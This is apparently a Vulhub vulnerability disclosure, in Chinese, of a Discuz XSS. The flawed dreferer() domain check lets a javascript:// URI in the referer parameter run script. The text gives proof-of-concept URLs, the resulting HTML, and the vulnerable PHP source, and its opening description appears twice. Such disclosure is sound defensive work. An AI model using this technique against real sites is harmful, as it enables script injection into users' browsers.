VULHUB ™

### 简要描述： 某函数缺陷导致的 XSS。 ### 详细说明： member.php?mod=logging&action=login&referer=javascript://www.discuz.net/ ``` <p>欢迎您回来，Newbie xx，现在将转入登录前页面<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p> <p class="alert_btnleft"><a href="javascript://www.discuz.net/">如果您的浏览器没有自动跳转，请点击此链接</a></p> ``` connect.php?receive=yes&mod=login&op=callback&referer=javascript://www.discuz.net/ ``` <p>抱歉，当前存在网络问题或服务器繁忙，详细错误：connect_error_code_0，错误代码：<a target=_blank href="http://wiki.opensns.qq.com/wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91%E5%85%AC%E5%85%B1%E8%BF%94%E5%9B%9E%E7%A0%81%E8%AF%B4%E6%98%8E">openId signature invalid</a>，请您稍候再试。谢谢。<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p> <p class="alert_btnleft"><a...

### 简要描述： 某函数缺陷导致的 XSS。 ### 详细说明： member.php?mod=logging&action=login&referer=javascript://www.discuz.net/ ``` <p>欢迎您回来，Newbie xx，现在将转入登录前页面<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p> <p class="alert_btnleft"><a href="javascript://www.discuz.net/">如果您的浏览器没有自动跳转，请点击此链接</a></p> ``` connect.php?receive=yes&mod=login&op=callback&referer=javascript://www.discuz.net/ ``` <p>抱歉，当前存在网络问题或服务器繁忙，详细错误：connect_error_code_0，错误代码：<a target=_blank href="http://wiki.opensns.qq.com/wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91%E5%85%AC%E5%85%B1%E8%BF%94%E5%9B%9E%E7%A0%81%E8%AF%B4%E6%98%8E">openId signature invalid</a>，请您稍候再试。谢谢。<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p> <p class="alert_btnleft"><a href="javascript://www.discuz.net/">如果您的浏览器没有自动跳转，请点击此链接</a></p> ``` source/function/function_core.php: ``` function dreferer($default = '') { ...... if(strpos($_G['referer'], 'member.php?mod=logging')) { $_G['referer'] = $default; } $reurl = parse_url($_G['referer']); if(!empty($reurl['host']) && !in_array($reurl['host'], array($_SERVER['HTTP_HOST'], 'www.'.$_SERVER['HTTP_HOST'])) && !in_array($_SERVER['HTTP_HOST'], array($reurl['host'], 'www.'.$reurl['host']))) { if(!in_array($reurl['host'], $_G['setting']['domain']['app']) && !isset($_G['setting']['domain']['list'][$reurl['host']])) { $domainroot = substr($reurl['host'], strpos($reurl['host'], '.')+1); if(empty($_G['setting']['domain']['root']) || (is_array($_G['setting']['domain']['root']) && !in_array($domainroot, $_G['setting']['domain']['root']))) { $_G['referer'] = $_G['setting']['domain']['defaultindex'] ? $_G['setting']['domain']['defaultindex'] : 'index.php'; } } } elseif(empty($reurl['host'])) { $_G['referer'] = $_G['siteurl'].'./'.$_G['referer']; } $_G['referer'] = durlencode($_G['referer']); return$_G['referer']; } ``` 这段代码使用 parse_url 解析 referer 后得到的 host 与 $_SERVER['HTTP_HOST'] 进行对比判断是否为站内，但由于这个函数本身是不做有效性检测的，所以使用 js URI 就可以绕过域检测执行 JS了。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201503/0612150511445998c695ba3944b540af80f37efc.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/0612150511445998c695ba3944b540af80f37efc.png)